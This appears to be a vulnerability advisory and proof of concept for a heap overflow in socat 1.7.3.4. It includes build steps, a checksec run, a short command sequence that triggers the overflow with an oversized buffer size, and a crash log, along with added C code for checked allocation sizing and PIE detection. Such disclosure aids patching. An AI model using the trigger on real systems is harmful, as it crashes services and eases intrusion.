# Exploit Title: Socat 1.7.3.4 - Heap Based Overflow (PoC)  
# Date: 2020-02-03  
# Exploit Author: hieubl from HPT Cyber Security  
# Vendor Homepage: http://www.dest-unreach.org/  
# Software Link: http://www.dest-unreach.org/socat/  
# Version: 1.7.3.4  
# Tested on: Ubuntu 16.04.6 LTS  
# CVE :  
  
# Heap-Based Overflow due to Integer Overflow and Lack of PIE mitigation (PoC)  
  
------- [***Description***] -------  
The source code of socat.c contains the _socat() function, which has the
Integer Overflow vulnerability:

int _socat(void) {
...
    unsigned char *buff;
...
    /* 2*bufsiz+1 is computed in unsigned arithmetic and can wrap to a small value */
    buff = Malloc(2*socat_opts.bufsiz+1);
...
}

After that, the line of code "if ((bytes2 = xiotransfer(sock2,
sock1, &buff, socat_opts.bufsiz, true)) < 0) {" calls the
xiotransfer() function. The xiotransfer() function calls the xioread()
function. Finally, the xioread() function calls the Read() function:

ssize_t xioread(xiofile_t *file, void *buff, size_t bufsiz) {
...
    /* [***!!! This line of code leads to the Heap-Based Overflow vulnerability !!!***]
       bufsiz is derived from socat_opts.bufsiz, not from the real allocation size */
    Read(pipe->fd, buff, bufsiz);
...
}
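
The following C program is an added illustration, not code from the advisory or from socat itself. It reproduces the size arithmetic in isolation and shows the overflow-checked form a fix would use. Assumptions: socat_opts.bufsiz is a size_t, the compiler provides the GCC/Clang __builtin_mul_overflow and __builtin_add_overflow intrinsics, and the helper names (unchecked_alloc_size, checked_alloc_size, clamped_read_len, alloc_transfer_buffer) are hypothetical. The value 0x8000000000000050 is the one used on the PoC command line, and clamped_read_len mirrors the readbytes clamp quoted in the proof-of-concept section. With the +1 included, the wrapped request is 0xa1 bytes; the 0xa0 figure in the PoC section is 2*bufsiz before the +1.

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdbool.h>

/* The size computation as socat 1.7.3.4 performs it (assumption: bufsiz is a
 * size_t). Unsigned arithmetic wraps modulo 2^64, so a huge bufsiz yields a
 * tiny allocation request. */
size_t unchecked_alloc_size(size_t bufsiz) {
    return 2 * bufsiz + 1;
}

/* Overflow-checked version of the same formula: every step is verified with
 * the __builtin_*_overflow intrinsics and the request is refused on wrap. */
bool checked_alloc_size(size_t bufsiz, size_t *out) {
    size_t doubled, total;
    if (__builtin_mul_overflow(bufsiz, (size_t)2, &doubled)) return false;
    if (__builtin_add_overflow(doubled, (size_t)1, &total)) return false;
    *out = total;
    return true;
}

/* Convenience form for callers that treat 0 as "rejected". */
size_t checked_alloc_size_or_zero(size_t bufsiz) {
    size_t n;
    return checked_alloc_size(bufsiz, &n) ? n : 0;
}

/* Mirrors the readbytes clamp quoted in the advisory: the read length is
 * min(bufsiz, remaining readbytes). It never consults the real allocation
 * size, which is why readbytes=1000000 still reads 1000000 bytes into the
 * wrapped buffer. */
size_t clamped_read_len(size_t bufsiz, size_t remaining_readbytes) {
    if (remaining_readbytes == 0) return 0;
    return remaining_readbytes < bufsiz ? remaining_readbytes : bufsiz;
}

/* True when a read of read_len bytes into an allocation of alloc_len bytes
 * would write past its end: the heap-overflow condition. */
bool read_overflows(size_t alloc_len, size_t read_len) {
    return read_len > alloc_len;
}

/* Hardened allocator wrapper (hypothetical): returns NULL on wrap instead of
 * passing a truncated size to malloc. Callers must handle NULL. */
unsigned char *alloc_transfer_buffer(size_t bufsiz) {
    size_t n;
    if (!checked_alloc_size(bufsiz, &n)) return NULL;
    return malloc(n);
}

int main(void) {
    const size_t poc = 0x8000000000000050ULL;   /* value from the PoC command line */
    size_t wrapped = unchecked_alloc_size(poc);
    size_t rl = clamped_read_len(poc, 1000000); /* readbytes=1000000 from the PoC */

    printf("unchecked: 2*0x%zx+1 wraps to 0x%zx\n", poc, wrapped);
    printf("checked:   %s\n", checked_alloc_size_or_zero(poc) ? "ok" : "rejected (overflow)");
    printf("read of %zu bytes into %zu-byte buffer: overflow=%d\n",
           rl, wrapped, read_overflows(wrapped, rl));
    printf("hardened allocation: %s\n",
           alloc_transfer_buffer(poc) == NULL ? "refused" : "granted");
    return 0;
}
```

Compile with a recent GCC or Clang (the intrinsics are builtins, no extra flags needed). The point of the split into checked_alloc_size and clamped_read_len is that fixing only the clamp would not be enough: the read length must be bounded by the size that was actually allocated, and the allocation size must not be allowed to wrap in the first place.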
  
In addition, the "Makefile" file does not turn on the Position
Independent Executables (PIE) mitigation (the CFLAGS does not contain
the "-pie" flag). By default, Ubuntu 16.04 does not turn on this
mitigation either. Consequently, it is easier to exploit the program, which
may even lead to Remote Code Execution (RCE).
Reference: https://hackerone.com/reports/415272, $100 bounty for Linux  
Desktop application slack executable does not use pie / no ASLR  
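
As an added check that is not part of the advisory, the following C program reads an ELF header and reports whether the file is a fixed-address executable (ET_EXEC, no PIE) or position-independent (ET_DYN), so a rebuilt socat binary can be verified without external tools. The function names are hypothetical and the sample headers are constructed inline; they are not real binaries. ET_DYN also covers shared objects, so the result is only meaningful for a file you know is an executable.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* e_type values from the ELF specification: ET_EXEC is a fixed-address image,
 * ET_DYN is position-independent (a PIE executable or a shared object). */
#define ELF_ET_EXEC 2
#define ELF_ET_DYN  3

/* Inspects the first 18 bytes of an ELF header: magic (bytes 0-3), EI_DATA
 * (byte 5) for byte order, and e_type (bytes 16-17). Returns 1 for ET_DYN,
 * 0 for ET_EXEC and -1 when the bytes are not an ELF header of a known type. */
int elf_header_is_pie(const unsigned char *hdr, size_t len) {
    if (len < 18 || memcmp(hdr, "\x7f" "ELF", 4) != 0) return -1;
    int little_endian = (hdr[5] == 1);
    unsigned e_type = little_endian
        ? (unsigned)hdr[16] | ((unsigned)hdr[17] << 8)
        : (unsigned)hdr[17] | ((unsigned)hdr[16] << 8);
    if (e_type == ELF_ET_DYN)  return 1;
    if (e_type == ELF_ET_EXEC) return 0;
    return -1;
}

/* Same check on a file on disk, e.g. the freshly built socat binary. */
int elf_file_is_pie(const char *path) {
    unsigned char hdr[64];
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    size_t n = fread(hdr, 1, sizeof hdr, f);
    fclose(f);
    return elf_header_is_pie(hdr, n);
}

/* Constructed sample headers (not real binaries): little-endian ET_DYN,
 * little-endian ET_EXEC, big-endian ET_EXEC, and a non-ELF script. */
const unsigned char SAMPLE_PIE_LE[18]  = {0x7f,'E','L','F', 2,1,1, 0,0,0,0,0,0,0,0,0, 0x03,0x00};
const unsigned char SAMPLE_EXEC_LE[18] = {0x7f,'E','L','F', 2,1,1, 0,0,0,0,0,0,0,0,0, 0x02,0x00};
const unsigned char SAMPLE_EXEC_BE[18] = {0x7f,'E','L','F', 2,2,1, 0,0,0,0,0,0,0,0,0, 0x00,0x02};
const unsigned char SAMPLE_NOT_ELF[18] = "#!/bin/sh\n";

int main(int argc, char **argv) {
    /* Assumption: run from the build directory, or pass a path explicitly. */
    const char *path = argc > 1 ? argv[1] : "./socat";
    int r = elf_file_is_pie(path);
    printf("%s: %s\n", path,
           r == 1 ? "PIE (ET_DYN)" :
           r == 0 ? "no PIE (ET_EXEC)" : "not a recognised ELF executable");
    return r == 1 ? 0 : 1;
}
```

A build with -fPIE in CFLAGS and -pie passed to the linker produces an ET_DYN executable, which this check reports as "PIE (ET_DYN)"; the socat binary built with the unmodified Makefile reports "no PIE (ET_EXEC)", matching the checksec output in the next section.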
  
------- [***Download and build***] -------  
Download link: http://www.dest-unreach.org/socat/download/socat-1.7.3.4.tar.gz  
$ tar xzvf socat-1.7.3.4.tar.gz  
$ cd socat-1.7.3.4/  
$ ./configure  
Modify the "Makefile" file so that it reads "CFLAGS = -g -O -D_GNU_SOURCE -Wall
-Wno-parentheses $(CCOPTS) $(DEFS) $(CPPFLAGS)" (the "-g" flag is added for
debugging purposes)
$ make  
$ sudo make install  
  
------- [***Proof of Concept***] -------  
$ checksec socat  
[*] '/home/natsu/temp/socat-1.7.3.4/socat'  
Arch: amd64-64-little  
RELRO: Partial RELRO  
Stack: Canary found  
NX: NX enabled  
PIE: No PIE (0x400000)  
FORTIFY: Enabled  
>>> There is no PIE mitigation!  
  
$ python -c 'print "A"*1000000' > a  
$ touch b  
$ socat -b9223372036854775888 OPEN:a,readbytes=1000000 OPEN:b,readbytes=1000000  
  
This proof of concept triggers the bug by setting the buffer size to
0x8000000000000050 (9223372036854775888 in decimal). The size passed to
"Malloc(2*socat_opts.bufsiz+1)" is therefore 0x100000000000000a0, which is
truncated to 64 bits, so the call is equivalent to Malloc(0xa0). The readbytes
option ("readbytes=1000000") controls the size of the read (we cannot read with
a size as large as 0x8000000000000050) through these lines of code:

if (pipe->readbytes) {
    if (pipe->actbytes == 0) {
        return 0;
    }
    if (pipe->actbytes < bufsiz) {
        bufsiz = pipe->actbytes;
    }
}

------- [***Crash logs***] -------
*** Error in `socat': free(): invalid next size (normal): 0x000000000106a110 ***
======= Backtrace: =========  
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fc0ee5817e5]  
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fc0ee58a37a]  
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fc0ee58e53c]  
socat[0x407e3f]  
socat[0x4084c6]  
socat[0x408f7a]  
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fc0ee52a830]  
socat[0x4057a9]  
======= Memory map: ========  
00400000-0044a000 r-xp 00000000 08:01 655643 /usr/local/bin/socat
00649000-0064a000 r--p 00049000 08:01 655643 /usr/local/bin/socat
0064a000-0064b000 rw-p 0004a000 08:01 655643 /usr/local/bin/socat
0064b000-0068c000 rw-p 00000000 00:00 0
01069000-0108a000 rw-p 00000000 00:00 0 [heap]
7fc0e8000000-7fc0e8021000 rw-p 00000000 00:00 0
7fc0e8021000-7fc0ec000000 ---p 00000000 00:00 0
7fc0eded3000-7fc0edee9000 r-xp 00000000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fc0edee9000-7fc0ee0e8000 ---p 00016000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fc0ee0e8000-7fc0ee0e9000 rw-p 00015000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fc0ee0e9000-7fc0ee0ec000 r-xp 00000000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee0ec000-7fc0ee2eb000 ---p 00003000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2eb000-7fc0ee2ec000 r--p 00002000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2ec000-7fc0ee2ed000 rw-p 00003000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2ed000-7fc0ee305000 r-xp 00000000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee305000-7fc0ee504000 ---p 00018000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee504000-7fc0ee505000 r--p 00017000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee505000-7fc0ee506000 rw-p 00018000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee506000-7fc0ee50a000 rw-p 00000000 00:00 0
7fc0ee50a000-7fc0ee6ca000 r-xp 00000000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee6ca000-7fc0ee8ca000 ---p 001c0000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8ca000-7fc0ee8ce000 r--p 001c0000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8ce000-7fc0ee8d0000 rw-p 001c4000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8d0000-7fc0ee8d4000 rw-p 00000000 00:00 0
7fc0ee8d4000-7fc0eeaef000 r-xp 00000000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eeaef000-7fc0eecee000 ---p 0021b000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eecee000-7fc0eed0a000 r--p 0021a000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eed0a000-7fc0eed16000 rw-p 00236000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eed16000-7fc0eed19000 rw-p 00000000 00:00 0
7fc0eed19000-7fc0eed77000 r-xp 00000000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eed77000-7fc0eef77000 ---p 0005e000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef77000-7fc0eef7b000 r--p 0005e000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef7b000-7fc0eef82000 rw-p 00062000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef82000-7fc0eef84000 r-xp 00000000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so
7fc0eef84000-7fc0ef183000 ---p 00002000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef183000-7fc0ef184000 r--p 00001000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef184000-7fc0ef185000 rw-p 00002000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef185000-7fc0ef18c000 r-xp 00000000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef18c000-7fc0ef38b000 ---p 00007000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38b000-7fc0ef38c000 r--p 00006000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38c000-7fc0ef38d000 rw-p 00007000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38d000-7fc0ef3b3000 r-xp 00000000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef594000-7fc0ef59a000 rw-p 00000000 00:00 0
7fc0ef5b1000-7fc0ef5b2000 rw-p 00000000 00:00 0
7fc0ef5b2000-7fc0ef5b3000 r--p 00025000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef5b3000-7fc0ef5b4000 rw-p 00026000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef5b4000-7fc0ef5b5000 rw-p 00000000 00:00 0
7ffe11dd9000-7ffe11dfa000 rw-p 00000000 00:00 0 [stack]
7ffe11dfb000-7ffe11dfe000 r--p 00000000 00:00 0 [vvar]
7ffe11dfe000-7ffe11e00000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
2020/02/04 05:33:00 socat[47233] E exiting on signal 6